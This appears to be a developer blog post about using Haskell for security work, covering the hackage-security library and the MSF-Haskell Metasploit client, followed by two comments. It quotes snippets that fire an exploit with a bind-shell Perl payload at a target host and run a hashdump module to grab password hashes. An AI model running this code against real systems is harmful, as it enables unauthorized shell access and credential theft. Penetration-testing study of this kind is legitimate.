Paula

Security with Haskell

From "you are crazy" to "why even?" are some of the things my friends in the computer science environment have told me when I started working with Haskell in general and security in particular. Answering in order: yes, I'm crazy, but not because of Haskell, and there's a reason why I chose to use Haskell for security. First of all, functional programming is the new black and probably more and more apps will be built using it. Choosing a pure functional language for security is not that crazy. On the other hand, the mathematical approach Haskell takes is very useful in cryptography.

So, how can I use Haskell for auditing security?

I'd like to point here to a specific library called hackage-security which currently supports only index signing. As described in the wiki, the library has two main entry points: Hackage.Security.Client is the main entry point for clients, and Hackage.Security.Server is the main entry point for servers. It is worth a check.

Apart from this, there's also a repository on GitHub called MSF-Haskell that allows performing penetration testing with Haskell. It also includes a script in Haskell as an example, and the whole whitepaper, too. It's actually an implementation of the Metasploit API, which lets developers write Haskell clients that communicate with the Metasploit server. For example, this part of the example script launches an example exploit against a target host.

launchExploit :: (LoudCxt s) => Host Attackable -> MSF s ()
launchExploit targetHost = do
  _ <- module_execute metasploitableModuleType metasploitableModuleName
      $ toObject
      $ Map.fromList
          [ ("RHOST",   toObject targetHost)
          , ("PAYLOAD", toObject metasploitablePayload)
          ]
  return ()

And we previously defined the payload itself:

metasploitablePayload = Payload "cmd/unix/bind_perl"

Or this part for grabbing password hashes:

gatherCredentials :: (LoudCxt s) => SessionId -> MSF s ()
gatherCredentials sessionId = do
  let modTyp = PostModuleType
      modNm = ModuleName "linux/gather/hashdump"

  r <- module_execute modTyp modNm
      $ toObject
      $ Map.fromList
          [ ("SESSION",   toObject sessionId)
          ]
  case r of
    (ExecJobId j) -> waitJob j
    _             -> return ()

To sum up, Haskell could be an option for functional scripting in security. Maybe good_option, you know, just an option or nothing, haha, functional joke, badum tss.

Anyway, these are a brand new type of attacks! Even from scratch, and not using API implementations such as those described before. Speaking about crypto, this repo is interesting, as it handles elliptic curve encryption. Welp, I invite you all to take a look at the cryptography repos on the official Haskell website, as well as the security repos. I'm still investigating, so if anyone is working in the same field here, please provide more info!

Top comments (2)

Gio

I don't quite understand why anyone would question the use of Haskell for security. The characteristics of Haskell (purity, strict type system, abstraction, and more) make it a great candidate for security analysis / research.

Using JavaScript for security analysis / research, on the other hand, would be insane.

Ondřej

Absolutely, purely functional languages go with security hand in hand.